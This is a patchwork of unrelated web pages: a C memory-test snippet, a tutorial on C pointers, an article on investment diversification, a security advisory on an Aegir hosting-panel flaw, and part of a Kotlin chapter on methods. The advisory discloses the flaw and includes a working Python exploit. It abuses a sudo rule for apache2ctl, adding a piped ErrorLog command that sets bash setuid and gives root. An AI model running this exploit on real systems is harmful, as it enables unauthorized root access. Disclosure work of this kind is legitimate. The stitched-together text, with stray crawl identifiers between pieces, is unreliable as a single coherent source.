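One suggestion for the full test: qualifying the test pointer as volatile forces the compiler to perform every read and write, so the optimizer cannot drop the "redundant" accesses even at high optimization levels. Below is a minimal sketch of a walking-pattern plus address-pattern test; select_ram_page() is the routine from the post above, while chip_base[], RAM_REGION_SIZE and the integer types are illustrative assumptions rather than tested 52259 code. Note that it overwrites the RAM under test, so it should run before the memory is used for anything else.

uint_16 test_memory_full(void)
{
    uint_16 chip;
    unsigned long offset;
    volatile uint_8 *p;   /* volatile: every access really hits the bus */

    for (chip = 0; chip < 8; chip++)
    {
        select_ram_page(chip_base[chip]);

        /* Pass 1: walk 0x55/0xAA through each location to find stuck data bits. */
        for (offset = 0; offset < RAM_REGION_SIZE; offset++)
        {
            p = (volatile uint_8 *)(chip_base[chip] + offset);
            *p = 0x55;
            if (*p != 0x55) { select_ram_page(0); return chip; }
            *p = 0xAA;
            if (*p != 0xAA) { select_ram_page(0); return chip; }
        }

        /* Pass 2: write an address-derived value everywhere, then verify,
           so open or shorted address lines show up as aliased locations. */
        for (offset = 0; offset < RAM_REGION_SIZE; offset++)
        {
            p = (volatile uint_8 *)(chip_base[chip] + offset);
            *p = (uint_8)(offset ^ (offset >> 8));
        }
        for (offset = 0; offset < RAM_REGION_SIZE; offset++)
        {
            p = (volatile uint_8 *)(chip_base[chip] + offset);
            if (*p != (uint_8)(offset ^ (offset >> 8))) { select_ram_page(0); return chip; }
        }
    }
    select_ram_page(0);
    return 8; /* all chips passed */
}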
https://community.nxp.com/thread/77618
CC-MAIN-2018-43
en
refinedweb
This is a long one. If you want to ease yourself into it, go and read the other ones for today which are much shorter and then come back to this one. Seriously - it's a doozy. Pointers, one of the toughest parts of C, are what we'll be tackling today. So you've had the past week to wrestle with pointers on your own, and no doubt you've all become something of self-made experts on the subject. So let's have a rather simple warm-up puzzle. So what's the output of this file?

#include <stdio.h>

int main() {
    int a = 5, b = 15;
    int *p1, *p2;
    p1 = &a;
    p2 = &b;
    *p1 = 10;
    *p2 = *p1;
    p1 = p2;
    *p1 = 20;
    printf("a: %d ", a);
    printf("b: %d\n", b);
    printf("p1: %p p2: %p\n", p1, p2);
    return 0;
}

Did you get it?

a: 10 b: 20
p1: 0x7fff58bbd754 p2: 0x7fff58bbd754

Of course, the particular pointer locations are irrelevant except in that p1 and p2 should be the same value; since the operating system is what allocates memory, these values should most likely be different each time you run the program. But in case you didn't quite get the right answer, let's break it down. What's a pointer? A pointer is just a variable that represents a location in memory. So after initializing a and b to 5 and 15 respectively, we create two pointers p1 and p2. How do we assign the two pointers to the addresses in which a and b are stored? We create a reference with the & operator. A common novice error is putting the reference operator on the left side of the assignment operator, where it can never appear. This makes logical sense - you can't change the address in which something is stored. All you can do is instead copy the same information held at that address to a new location, and then later free whatever was held in the original location. Okay, so far so good. The * operator is known as dereferencing a pointer. It means we're accessing not the address represented by the pointer, but the value in memory represented by that address. Unlike the reference operator, the dereference operator can be present on either side of the assignment operator. So *p1 accesses the value that a stores; in this case, we're functionally resetting a to be 10, and similarly we set b to the same value. Here is the part that may have confused some of you. We set p1 to point to the same address to which p2 points, so they are both manipulating the area of memory in which b is stored. Then, we set that value to be 20, thus altering b. And that's it! So now that we've had this quick three-minute review of pointers, we're ready for some better puzzles. This puzzle tests disambiguation of pointers. Fundamentally, we're going to explore an array of type versus pointer to type. Here's pointer_test.c. What's the output?

#include <stdio.h>

int main(int argc, const char *argv[]) {
    int a[5] = { 1, 2, 3, 4, 5 };
    int *ptr = (int *)(&a + 1);
    printf("%d %d\n", *(a + 1), *(ptr - 1));
    return 0;
}

You may remember from the lecture that the variable that represents an array is actually a pointer referencing the zero-eth element in that array. So in this example, a is actually a pointer referencing a[0] - in this case, 1. By that logic, a + 1 merely references the next integer - a[1]; thus, the first integer printed is 2. That's the easy part. The next one is a little tougher. If you treated *ptr as a simple pointer to an integer – like you treated a – you'd be tempted to give the following incorrect explanation: Since ptr points to the location of a, &a + 1 merely points to the location of a[1]; thus, ptr - 1 goes back to referencing a[0]. So the second number printed must be 1.
Nope! The trick here is that ptr is not a pointer to an integer. It is a pointer to an array – which is entirely different. Pointer arithmetic on these two variables works entirely differently. A pointer to an integer, when incremented, will simply move up in memory by the number of bytes an integer represents. A pointer to an array, however, will move up in memory by the length of the array when incremented. Thus, when incremented, it moves up by five elements - to the slot in memory right after 5 in the array a. When decremented, however, printf is treating the output as a pointer to an integer, and not a pointer to an array. So when we subtract 1 inside the printf statement, ptr references a[4] instead of a[5], and dereferencing that gives us 5. So the output is 2 5. Phew! This puzzle is testing a concept known as pointer disambiguation, where the same pointer can be treated differently depending on the context. Let's warm up our disambiguation skills with a little puzzle: what are the differences between the following three declarations?

int* arr1[8];
int (*arr2)[8];
int *(arr3[8]);

The first is an array of integer pointers - specifically, an array of length eight. The second is a pointer to an array of integers. And the third is the same as the first! So how the heck do we start evaluating these things? The difference here is critical. Operator precedence can be a rather esoteric subject – especially when function pointers get involved, as you'll see next time – but there are a couple simple rules that can help you learn rather quickly how this works. The C Bible (K&R, as you all should know well by now) suggests using cdecl for any very complicated situations. It is wonderful, and you should definitely consider it. Order of operations seems fairly obvious, and in general we encounter fairly trivial examples. But what about when you get something like the following?

char *(*(**foo[][8])())[];

The rules to remember are that "array of" ( [ ]) and "function returning" ( ( )) have higher precedence than "pointer to" ( *), and that we always start the sentence at the variable name ("foo is ...") and end it with the base type. Let's go through some examples.

long **foo[7];

As we go through the example, I'll strike out whatever we've dealt with. We start with the variable, and end with the type. foo is ... long. Okay, simple enough. Now let's fill in the middle. long ** foo[7]; "Array of" has the highest precedence, so we can and must go right. This gives us the sentence foo is array of 7 ... long. long ** foo[7] Now, we've gone as far to the right as possible. This means we have no choice but to go left. foo is array of 7 pointer to ... long takes care of the first "pointer to", but we have one last pointer. Here is the final result: foo is array of 7 pointer to pointer to long. Think you've got the hang of it? Let's try some really hairy examples to really get it down.

char * ( * ( * *foo [][8])())[];

We start as usual, with the variable and the simple type: foo is ... char. Sweet, let's see what we have left. char * ( * ( * * foo [][8])())[] Since foo touches both "pointer to" and "array of", we go right as much as we can. This gives us: foo is array of array of 8 ... char char * ( * ( * * foo [][8])())[] Okay, now we have no choice but to go left. It has two "pointer to" phrases to add: foo is array of array of 8 pointer to pointer to ... char Leaving this: char * ( * ( * *foo [][8])())[] What do we do now!? There seems to be an empty set of parentheses? It must be a function call! This involves pointers to functions. Remember, we try and go right when we can.
On the right is a function call, and on the left is a "pointer to". Remember our rule – "function returning" has higher precedence. So here is our new sentence: foo is array of array of 8 pointer to pointer to function returning ... char This leaves us with the following: char * ( * ( * *foo [][8]) () )[] We would like to go right, but we have a set of parentheses that block our way. As you know, parens have a much higher precedence than anything else, so we must oblige and go left. This gives us the following: foo is array of array of 8 pointer to pointer to function returning pointer to ... char Which gives us this left over: char * ( * ( * * foo [][8])() ) [] So all that's left is an "array of" and a "pointer to"; as you well know, we can go right and then left, finishing off our sentence. That gives us the final result – the following mouthful: foo is array of array of 8 pointer to pointer to function returning pointer to array of pointer to char Wow! Thought we were done? We're just getting started. What we saw in the more complicated example there was a function pointer – a pointer to a function. These nasty beasts are a hallmark of C; in higher languages like C++, you would usually reach for polymorphism and virtual functions instead, so function pointers remain most at home in C. Lucky you. Why do we have pointers to functions? There are lots of cases where it's more useful to design a function to be general purpose; this way, the function you're writing can accept any function as a parameter and simply call that function. The most common example is sorting. Your sort function can take a compare function as a parameter – this way, you can write seven small compare functions and just a single sorting function, rather than seven long sorting functions. This follows good coding design of factoring out code as well. Let's start with a simple example.

void (*foo)(int);

Here, foo is a pointer to a function that takes a single argument, an int, and returns void. The tip to make it easier is that you're just writing out the function declaration but surrounding the function name by a set of parens. So foo would be declared like this:

void foo(int a);

Pretty simple! What about this?

void *(*foo)(int *);

Again, re-writing the function header helps.

void *foo (int * a);

One interesting thing about function pointers is that the reference operator ( &) becomes optional, as does the dereference ( *). Because why not. Pointers were too simple anyways.

void foo(int a) {
    printf("%d\n", a);
}

int main() {
    void (*func)(int);
    func = foo;
    func = &foo;
    func(5);
    (*func)(5);
    return 0;
}

Both ways of assigning func are legal, and both ways of calling func are also legal. Here are some guidelines to keep in mind when talking about pointers and specifically function pointers:

void *foo; // legal
void foo(); // legal
void foo; // not legal
void foo[]; // not legal
char foo[1][2][3][4][5] // legal
char foo[] // legal
char foo[][5] // legal
char foo[5][] // not legal

Functions cannot return arrays; they can return pointers, and they can return pointers to arrays, but they cannot return arrays. Functions cannot return functions. (We need to go deeper.) Cannot have an array of functions. But with function pointers come abstract declarators. These wonderful little creatures are used in two places: casts, and arguments for sizeof. They look something like this:

int ( * ( * ) ( ) ) ( )

This is another wonderfully sublime moment. It seems unfair, certainly.
I told you to always start at the variable name, which led to the logical conclusion of giving you an example without a variable name. Put away your inhaler and calm down. There are four rules that govern where a variable can be placed, and under those syntax rules there are actually only two places in the given example where a variable could go.

int ( * ( * x ) x ( ) ) ( )

The two x's represent the two possible locations of a variable. A quick look back at the fourth rule above tells us that there's only one location, so we can read the abstract declarator as the following:

int (*(*foo)())()

which translates to: foo is a pointer to function returning pointer to function returning int So, after all this advice, when you're reading some truly advanced C code, you won't freak out when you see this:

BOOL (__stdcall *foo)(...);

You'll think - hey! This is simple – foo is a pointer to a __stdcall function returning BOOL. Piece of cake. I highly recommend you read this guide - it's wonderful. Multidimensional pointers aren't too difficult. Let's have a three-dimensional array buffer, where each of the dimensions is 10:

char buffer[10][10][10];

We could directly index into it: buffer[3][4][5] Or we could use pointers: *( *( *( buffer + 3) + 4) + 5); Here, buffer acts as a triple pointer; adding 3 moves it over to the third triple pointer. Dereferencing that gives us a double pointer, and adding four to that gives us the fourth double pointer. Dereferencing that gives us just a regular pointer, and adding five gives us the fifth pointer. Finally, one last dereference gives us just a regular char. That's pretty much it! Here's one puzzle just to make sure you really understood the concept.

int main() {
    char arr[5][7][6];
    char (*p)[5][7][6] = &arr;
    printf("%d\n", (&arr + 1) - &arr);
    printf("%d\n", (char *)(&arr + 1) - (char *)&arr);
    printf("%d\n", (unsigned)(arr + 1) - (unsigned)arr);
    printf("%d\n", (unsigned)(p + 1) - (unsigned)p);
    return 0;
}

The output should be

1
210
42
210

Why does this program give an error?

#include <stdio.h>

void foo(const char **p) { }

int main(int argc, char **argv) {
    foo(argv);
    return 0;
}

This program uses a const pointer. This simply means that while the pointer itself can be changed, the memory it touches cannot change in value. In other words, it's not the pointer that's a const, but rather what it points to. This is why the const appears before the *. If you put the const after the * (like int * const p_int = &x;) then you get a regular old pointer to an int, but this time the value of p_int cannot change. Thus, it's the pointer that's a const. Here is a hint for the code example above.

char const c = 'a';
char* p = 0;
char const** pp = &p; // not allowed in C
*pp = &c; // p now points to c.
*p = 'b'; // changing a const value!

The first code snippet would work perfectly fine, without any warning, if p were a single pointer instead of a double pointer. So why does this break with double pointers? This is known as const correctness in C. Although it is possible to cast from char * to const char * without warning, C will prohibit char ** to const char ** casting. So why would this be prohibited? Imagine p is a char * – if so, logically, it could be used to modify whatever it's pointing at. Imagine you have another pointer, pp that points to p. You could use pp to assign to p the address of a const char - you could even use p to modify the const char, which might even be in read-only memory! So why use const? One misconception is that this can be utilized to make further optimizations.
However, this is rarely the case. Usually, const is there for conceptual clarity and readability. Here are some further explanations of this issue in C. Oh, of course Alex Allain has another great tutorial. Here are some awesome resources about pointer arithmetic and a great video series by Stanford University.
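To close the loop on the sorting example mentioned earlier (one general sort function, many small compare functions), here is a small self-contained illustration using the standard library's qsort, which takes exactly such a function pointer; the data and names are just made up for the demo:

#include <stdio.h>
#include <stdlib.h>

/* A small comparator: qsort hands us pointers to two elements. */
static int compare_ints(const void *a, const void *b)
{
    int x = *(const int *)a;
    int y = *(const int *)b;
    return (x > y) - (x < y);   /* avoids the overflow that x - y could cause */
}

int main(void)
{
    int nums[] = { 42, 7, 19, 3, 25 };
    size_t count = sizeof nums / sizeof nums[0];

    /* qsort is the single general-purpose sorting function; its behavior is
       customized purely by the function pointer we pass in. */
    qsort(nums, count, sizeof nums[0], compare_ints);

    for (size_t i = 0; i < count; i++)
        printf("%d ", nums[i]);
    printf("\n");
    return 0;
}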
https://cs50.notablog.xyz/puzzle/Puzzle4.html
CC-MAIN-2018-43
en
refinedweb
In finance, diversification is the process of allocating capital in a way that reduces the exposure to any one particular asset or risk. A common path towards diversification is to reduce risk or volatility by investing in a variety of assets. If asset prices do not change in perfect synchrony, a diversified portfolio will have less variance than the weighted average variance of its constituent assets, and often less volatility than the least volatile of its constituents.[1] Diversification is one of two general techniques for reducing investment risk. The other is hedging. The simplest example is given by the proverb "Don't put all your eggs in one basket": dropping the basket will break all the eggs, while placing each egg in a different basket is more diversified; there is more risk of losing any one egg, but less risk of losing all of them. On the other hand, having a lot of baskets may increase costs.

In finance, an example of an undiversified portfolio is to hold only one stock. This is risky; it is not unusual for a single stock to go down 50% in one year. It is less common for a portfolio of 20 stocks to go down that much, especially if they are selected at random. If the stocks are selected from a variety of industries, company sizes and asset types it is even less likely to experience a 50% drop since it will mitigate any trends in that industry, company class, or asset type.[2][3]

If the prior expectations of the returns on all assets in the portfolio are identical, the expected return on a diversified portfolio will be identical to that on an undiversified portfolio. Some assets will do better than others; but since one does not know in advance which assets will perform better, this fact cannot be exploited in advance. The return on a diversified portfolio can never exceed that of the top-performing investment, and indeed will always be lower than the highest return (unless all returns are identical). Conversely, the diversified portfolio's return will always be higher than that of the worst-performing investment. So by diversifying, one loses the chance of having invested solely in the single asset that comes out best, but one also avoids having invested solely in the asset that comes out worst. That is the role of diversification: it narrows the range of possible outcomes. Diversification need not either help or hurt expected returns, unless the alternative non-diversified portfolio has a higher expected return.[4]

There is no magic number of stocks that is diversified versus not. A figure of 30 is sometimes quoted, although it can be as low as 10, provided they are carefully chosen. This is based on a result from John Evans and Stephen Archer.[5] Similarly, a 1985 book reported that most value from diversification comes from the first 15 or 20 different stocks in a portfolio.[6] More stocks give lower price volatility.

Given the advantages of diversification, many experts[who?] recommend maximum diversification, also known as "buying the market portfolio". Unfortunately, identifying that portfolio is not straightforward. The earliest definition comes from the capital asset pricing model which argues the maximum diversification comes from buying a pro rata share of all available assets. This is the idea underlying index funds. Diversification has no maximum so long as more assets are available.[7] Every equally weighted, uncorrelated asset added to a portfolio can add to that portfolio's measured diversification. When assets are not uniformly uncorrelated, a weighting approach that puts assets in proportion to their relative correlation can maximize the available diversification. "Risk parity" is an alternative idea. This weights assets in inverse proportion to risk, so the portfolio has equal risk in all asset classes.
This is justified both on theoretical grounds, and with the pragmatic argument that future risk is much easier to forecast than either future market price or future economic footprint.[8] "Correlation parity" is an extension of risk parity, and is the solution whereby each asset in a portfolio has an equal correlation with the portfolio, and is therefore the "most diversified portfolio". Risk parity is the special case of correlation parity when all pair-wise correlations are equal.[9]

One simple measure of financial risk is variance of the return on the portfolio. Diversification can lower the variance of a portfolio's return below what it would be if the entire portfolio were invested in the asset with the lowest variance of return, even if the assets' returns are uncorrelated. For example, let asset X have stochastic return $x$ and asset Y have stochastic return $y$, with respective return variances $\sigma_x^2$ and $\sigma_y^2$. If the fraction $q$ of a one-unit (e.g. one-million-dollar) portfolio is placed in asset X and the fraction $1-q$ is placed in Y, the stochastic portfolio return is $qx + (1-q)y$. If $x$ and $y$ are uncorrelated, the variance of portfolio return is $q^2\sigma_x^2 + (1-q)^2\sigma_y^2$. The variance-minimizing value of $q$ is $q = \sigma_y^2 / (\sigma_x^2 + \sigma_y^2)$, which is strictly between $0$ and $1$. Using this value of $q$ in the expression for the variance of portfolio return gives the latter as $\sigma_x^2\sigma_y^2 / (\sigma_x^2 + \sigma_y^2)$, which is less than what it would be at either of the undiversified values $q = 1$ and $q = 0$ (which respectively give portfolio return variance of $\sigma_x^2$ and $\sigma_y^2$). Note that the favorable effect of diversification on portfolio variance would be enhanced if $x$ and $y$ were negatively correlated but diminished (though not eliminated) if they were positively correlated.

In general, the presence of more assets in a portfolio leads to greater diversification benefits, as can be seen by considering portfolio variance as a function of $n$, the number of assets. For example, if all assets' returns are mutually uncorrelated and have identical variances $\sigma_x^2$, portfolio variance is minimized by holding all assets in the equal proportions $1/n$.[10] Then the portfolio return's variance equals $\operatorname{var}\left[\tfrac{1}{n}x_1 + \tfrac{1}{n}x_2 + \dots + \tfrac{1}{n}x_n\right]$ = $n\tfrac{1}{n^2}\sigma_x^2$ = $\tfrac{\sigma_x^2}{n}$, which is monotonically decreasing in $n$.

The latter analysis can be adapted to show why adding uncorrelated volatile assets to a portfolio,[11][12] thereby increasing the portfolio's size, is not diversification, which involves subdividing the portfolio among many smaller investments. In the case of adding investments, the portfolio's return is $x_1 + x_2 + \dots + x_n$ instead of $\tfrac{1}{n}x_1 + \tfrac{1}{n}x_2 + \dots + \tfrac{1}{n}x_n$, and the variance of the portfolio return if the assets are uncorrelated is $\sigma_{x_1}^2 + \sigma_{x_2}^2 + \dots + \sigma_{x_n}^2$, which is increasing in $n$ rather than decreasing. Thus, for example, when an insurance company adds more and more uncorrelated policies to its portfolio, this expansion does not itself represent diversification—the diversification occurs in the spreading of the insurance company's risks over a large number of part-owners of the company.

The expected return on a portfolio is a weighted average of the expected returns on each individual asset:

$\operatorname{E}[R_P] = \sum_{i=1}^{n} w_i \operatorname{E}[R_i]$

where $w_i$ is the proportion of the investor's total invested wealth in asset $i$. The variance of the portfolio return is given by:

$\sigma_P^2 = \operatorname{E}\left[\left(R_P - \operatorname{E}[R_P]\right)^2\right]$

Inserting in the expression for $R_P$:

$\sigma_P^2 = \operatorname{E}\left[\left(\sum_{i=1}^{n} w_i R_i - \sum_{i=1}^{n} w_i \operatorname{E}[R_i]\right)^2\right]$

Rearranging:

$\sigma_P^2 = \sum_{i=1}^{n} w_i^2 \sigma_i^2 + \sum_{i=1}^{n} \sum_{j \neq i} w_i w_j \sigma_{ij}$

where $\sigma_i^2$ is the variance on asset $i$ and $\sigma_{ij}$ is the covariance between assets $i$ and $j$. In an equally weighted portfolio, $w_i = 1/n$. The portfolio variance then becomes:

$\sigma_P^2 = n\frac{1}{n^2}\overline{\sigma_i^2} + n(n-1)\frac{1}{n^2}\overline{\sigma_{ij}}$

where $\overline{\sigma_{ij}}$ is the average of the covariances $\sigma_{ij}$ for $i \neq j$ and $\overline{\sigma_i^2}$ is the average of the variances.
Simplifying, we obtain

$\sigma_P^2 = \frac{1}{n}\overline{\sigma_i^2} + \frac{n-1}{n}\overline{\sigma_{ij}}$

As the number of assets grows we get the asymptotic formula:

$\lim_{n \to \infty} \sigma_P^2 = \overline{\sigma_{ij}}$

Thus, in an equally weighted portfolio, the portfolio variance tends to the average of covariances between securities as the number of securities becomes arbitrarily large.

The capital asset pricing model introduced the concepts of diversifiable and non-diversifiable risk. Synonyms for diversifiable risk are idiosyncratic risk, unsystematic risk, and security-specific risk. Synonyms for non-diversifiable risk are systematic risk, beta risk and market risk. If one buys all the stocks in the S&P 500 one is obviously exposed only to movements in that index. If one buys a single stock in the S&P 500, one is exposed both to index movements and movements in the stock based on its underlying company. The first risk is called "non-diversifiable", because it exists however many S&P 500 stocks are bought. The second risk is called "diversifiable", because it can be reduced by diversifying among stocks. In the presence of per-asset investment fees, there is also the possibility of overdiversifying to the point that the portfolio's performance will suffer because the fees outweigh the gains from diversification.

The capital asset pricing model argues that investors should only be compensated for non-diversifiable risk. Other financial models allow for multiple sources of non-diversifiable risk, but also insist that diversifiable risk should not carry any extra expected return. Still other models do not accept this contention.[13]

In 1977 Edwin Elton and Martin Gruber[14] worked out an empirical example of the gains from diversification. Their approach was to consider a population of 3,290 securities available for possible inclusion in a portfolio, and to consider the average risk over all possible randomly chosen n-asset portfolios with equal amounts held in each included asset, for various values of n. Their results are summarized in the following table. The result for n=30 is close to n=1,000, and even four stocks provide most of the reduction in risk compared with one stock.

In corporate portfolio models, diversification is thought of as being vertical or horizontal. Horizontal diversification is thought of as expanding a product line or acquiring related companies. Vertical diversification is synonymous with integrating the supply chain or amalgamating distribution channels. Non-incremental diversification is a strategy followed by conglomerates, where the individual business lines have little to do with one another, yet the company is attaining diversification from exogenous risk factors to stabilize and provide opportunity for active management of diverse resources.

Diversification is mentioned in the Bible, in the book of Ecclesiastes which was written in approximately 935 B.C.:[15] Diversification is also mentioned in the Talmud. The formula given there is to split one's assets into thirds: one third in business (buying and selling things), one third kept liquid (e.g. gold coins), and one third in land (real estate).[] Diversification is mentioned in Shakespeare (Merchant of Venice):[17] The modern understanding of diversification dates back to the work of Harry Markowitz in the 1950s.[18]
http://www.defaultlogic.com/learn?s=Diversification_(finance)
CC-MAIN-2018-43
en
refinedweb
express schematics to express pcb Outlook Express Contacts import outlook express to outlook outlook express repair contact list the polar express drawings Forgotten Outlook Express Password conference call express talk american express generetor lotus notes mail outlook express picture it express outlook express cyclic redundancy error InTransit the FREE award winning easy to use transport job booking, load optimisation, vehicle tracking and customer management system. Transport Software , intransit express , free software , free software com , data transport , Transport Calculator , Transport Management , transport systems , Transport Icons InTransit is an easy to use job booking, load optimisation, vehicle tracking and customer management system that consists of two main elements. MS Outlook Express DBX Recovery software is the advance utility to recover Outlook Express emails. You can restore deleted emails of Outlook Express from DBX files with the help of Outlook Express Restore software. DBX to MSG converter software to convert Outlook Express emails in MSG format. You can transfer from Outlook Express to Outlook. Convert complete Outlook Mailbox into Microsoft Outlook with Outlook Express Restore software. dbx to msg , dbx to msg converter , convert dbx to msg , dbx to msg conversion , convert outlook express to msg , convert outlook express to outlook Importing Outlook Express mailbox to Outlook has become an easy task with PCVARE Outlook Express Mailbox Converter Tool. The program helps users to convert. transfer Outlook Express mailbox to Outlook 2010. outlook express mailbox to outlook , outlook express mailbox converter , outlook express to outlook , convert outlook express mailbox to outlook , convert outlook express to outlook Extract Outlook Express emails has been rated as #1 Outlook Express Email Extractor tool to extract DBX emails and extract OE emails to EML. Now with Extract Outlook express Emails tool. process for Outlook Express email extraction have become. extract dbx , extract oe emails , outlook express Thunderbird to Outlook Express Converter allows you easily to convert Thunderbird to Outlook Express easily & effectively. Convert all items - attachments. meta data with Thunderbird to Outlook Express Conver. thunderbird to outlook express converter , convert thunderbird to outlook express , thunderbird to outlook express , thunderbird to outlook express conversion Export Outlook Express to MS Outlook through advanced and reliable Outlook Express email converter software. This is the best solution to convert Outlook Express to Outlook PST. outlook express email converter , convert outlook express to outlook , outlook express to ms outlook Recover emails from Outlook Express and repair or recover Outlook Express emails and convert Outlook Express emails in multiple formats like MSG. EML and DBX. Outlook Express Recovery software recover deleted emails from Outlook E. DBX to EML converter is the advance utility to convert Outlook Express emails from DBX to EML, this software perform multiple tasks like conversion, repairing and recovering.
http://freedownloadsapps.com/s/intransit-express/
CC-MAIN-2018-43
en
refinedweb
TL;DR Find out how we exploited a behavior of Apache while using the limited rights of the Aegir user to gain root access.

Vulnerability Summary
Aegir is a free and open source Unix based web hosting control panel program for application lifecycle management that provides a graphical interface designed to simplify deploying and managing Drupal, WordPress and CiviCRM Web sites. When installing Aegir using official packages, the script aegir3-provision.postinst installs an unsafe sudoer rule, allowing privileges to be elevated from the user aegir to root.

Credit
An independent Security Researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Systems
Aegir installations running under Apache

Unaffected Systems
Aegir installations running under Nginx

Vendor Response
The vendor released a statement that the user aegir should not be used by any untrusted user, as well as that customers should migrate to an Nginx setup (which is now the default) to prevent such attacks from being possible.

Vulnerability Analysis
During the installation of the package aegir3-provision, the script aegir3-provision.postinst will create a sudo configuration file in /etc/sudoers.d/aegir:

if [ -d /etc/sudoers.d ]; then
    ucf --debconf-ok /usr/share/drush/commands/provision/example.sudoers /etc/sudoers.d/aegir
    ucfr aegir-provision /etc/sudoers.d/aegir
    chmod 440 /etc/sudoers.d/aegir
else
    echo "running an older version of sudo"
    echo "copy content of /usr/share/drush/commands/provision/example.sudoers into /etc/sudoers for aegir to run properly"
fi

This file allows the user aegir to call /usr/sbin/apache2ctl (the reference to /etc/init.d/nginx is not relevant here, as the package is not installed by default):

aegir ALL=NOPASSWD: /usr/sbin/apache2ctl
aegir ALL=NOPASSWD: /etc/init.d/nginx

This way, the user aegir can reload apache2's configuration to support new virtual hosts. Part of this configuration is loaded from aegir's home directory, as aegir3-provision.postinst creates a symbolic link between /var/aegir/config/apache.conf and /etc/apache2/conf-enabled/aegir.conf:

case $WEBSERVER in
  apache)
    if [ -d /etc/apache2/conf-enabled ]; then
      # Apache 2.4
      ln -sf $AEGIRHOME/config/$WEBSERVER.conf /etc/apache2/conf-enabled/aegir.conf
    else
      # Apache 2.2
      ln -sf $AEGIRHOME/config/$WEBSERVER.conf /etc/apache2/conf.d/aegir.conf
    fi
    a2enmod ssl rewrite
    apache2ctl graceful
    ;;

However, configuration files can declare dynamic libraries to be loaded by the HTTP server and also external error loggers. As described in the documentation: Piped log processes are spawned by the parent Apache httpd process, and inherit the userid of that process. This means that piped log programs usually run as root.

By modifying /var/aegir/config/apache.conf to declare a custom ErrorLog, and then reloading the apache2 configuration using sudo /usr/sbin/apache2ctl restart, it will be possible to execute arbitrary commands as root. As /usr/sbin/apache2ctl can also accept various flags to declare additional configuration directives and write to arbitrary files, other ways to elevate privileges may exist.

Temporary workaround
Remove the file /etc/sudoers.d/aegir. As Aegir will not be able to reload the configuration of apache2, new hosts created on the interface will not be reachable before a manual reload.
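In shell terms, the workaround amounts to two steps (a sketch; both commands are run as root, and the second one is needed after every host change made through the Aegir front end):

# Drop the sudo rule that lets the aegir user drive apache2ctl.
rm /etc/sudoers.d/aegir

# After creating or changing sites in Aegir, reload Apache manually as root:
apache2ctl graceful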
Fix (Unofficial)
The following changes could be implemented to prevent the privilege escalation:

Demo Exploit

#!/usr/bin/python2.7
import sys
import os

COMMAND='/usr/bin/chmod +s /bin/bash'
SUDO_RELOAD='/usr/bin/sudo /usr/sbin/apache2ctl restart'
APACHE_CONFIG='/var/aegir/config/apache.conf'

if not COMMAND and len(sys.argv) != 2:
    print 'Usage: python2.7 {} <command>'.format(sys.argv[0])
    sys.exit(1)

with open(APACHE_CONFIG, 'a+') as f:
    cmd = sys.argv[1] if not COMMAND else COMMAND
    f.write('''
<VirtualHost *:80>
    DocumentRoot /var/www/
    ErrorLog "|{}"
</VirtualHost>
'''.format(cmd.replace('"', '\\"')))

os.system(SUDO_RELOAD)
os.execvp('bash', ['bash', '-p'])
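To check whether a given installation matches the vulnerable setup described above, the relevant paths from the analysis can be inspected directly (a convenience sketch, not part of the advisory):

# Is the permissive sudo rule installed?
cat /etc/sudoers.d/aegir

# Is Apache pulling configuration from aegir's home directory?
ls -l /etc/apache2/conf-enabled/aegir.conf   # Apache 2.4
ls -l /etc/apache2/conf.d/aegir.conf         # Apache 2.2

# Who owns and can write that configuration file?
ls -l /var/aegir/config/apache.conf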
https://ssd-disclosure.com/aegir-with-apache-lpe/
CC-MAIN-2022-40
en
refinedweb
14 Methods

The previous chapter introduced properties, which are constants and variables that are part of classes and objects. Methods, as you've already seen, are merely functions that reside inside a class or object. In this chapter, you'll take a closer look at methods. As with properties, you'll begin to design more complex classes and objects.

Method refresher
Consider ArrayList.removeAt(). It pops the item at a given index off an instance of an array list:

val numbers = arrayListOf(1, 2, 3)
numbers.removeAt(numbers.lastIndex)
println(numbers)
// > [1, 2]

Methods like removeAt() help you control the data in the array list.

Comparing methods to getters and setters
With custom accessors, you saw in the last chapter that you could run code from inside a class within a property definition. That sounds a lot like a method. What's the difference? It really comes down to a matter of style, but there are a few helpful thoughts to help you decide.

Turning a function into a method
To explore methods, you will create a simple model for dates called SimpleDate. Be aware that the various Kotlin platforms, such as the JVM and JS, contain production-ready Date classes that correctly handle many of the subtle intricacies of dealing with dates and times.

val months = arrayOf(
  "January", "February", "March",
  "April", "May", "June",
  "July", "August", "September",
  "October", "November", "December"
)

class SimpleDate1(var month: String)

fun monthsUntilWinterBreak(from: SimpleDate1): Int {
  return months.indexOf("December") - months.indexOf(from.month)
}

class SimpleDate2(var month: String) {
  fun monthsUntilWinterBreak(from: SimpleDate2): Int {
    return months.indexOf("December") - months.indexOf(from.month)
  }
}

val date2 = SimpleDate2("October")
println(date2.monthsUntilWinterBreak(date2)) // > 2

date.monthsUntilWinterBreak() // Error!

Introducing this
A class definition is like a blueprint, whereas an instance is a real object. To access the value of an instance, you use the keyword this inside the class.

// 1
fun monthsUntilWinterBreak(): Int {
  // 2
  return months.indexOf("December") - months.indexOf(this.month)
}

val date3 = SimpleDate3("September")
date3.monthsUntilWinterBreak()

// 3
return months.indexOf("December") - months.indexOf(month)

Mini-exercise
Since monthsUntilWinterBreak() returns a single value and there's not much calculation involved, transform the method into a property with a custom getter.

Object methods
Like classes, Kotlin objects defined with the object keyword can have member functions that refer to the object itself.

class MyMath {
  // 1
  companion object {
    fun factorial(number: Int): Int {
      // 2
      return (1..number).fold(1) { a, b -> a * b }
    }
  }
}
// 3
MyMath.factorial(6) // 720

Mini-exercise
Add a method to the MyMath class that calculates the n-th triangle number. It will be very similar to the factorial formula, except instead of multiplying the numbers, you add them.

Extension methods
Sometimes you want to add functionality to a class but don't want to muddy up the original definition. And sometimes you can't add the functionality because you don't have access to the source code.
fun SimpleDate.monthsUntilSummerBreak(): Int {
  val monthIndex = months.indexOf(month)
  return if (monthIndex in 0..months.indexOf("June")) {
    months.indexOf("June") - months.indexOf(month)
  } else if (monthIndex in months.indexOf("June")..months.indexOf("August")) {
    0
  } else {
    months.indexOf("June") + (12 - months.indexOf(month))
  }
}

val date = SimpleDate()
date.month = "December"
println(date.monthsUntilSummerBreak())
// > 6

fun Int.abs(): Int {
  return if (this < 0) -this else this
}

println(4.abs()) // > 4
println((-4).abs()) // > 4

Companion object extensions
If your class has a companion object, you can add extension methods to it by using the implicit companion object name Companion, or by using the custom name if the companion object has one.

fun MyMath.Companion.primeFactors(value: Int): List<Int> {
  // 1
  var remainingValue = value
  // 2
  var testFactor = 2
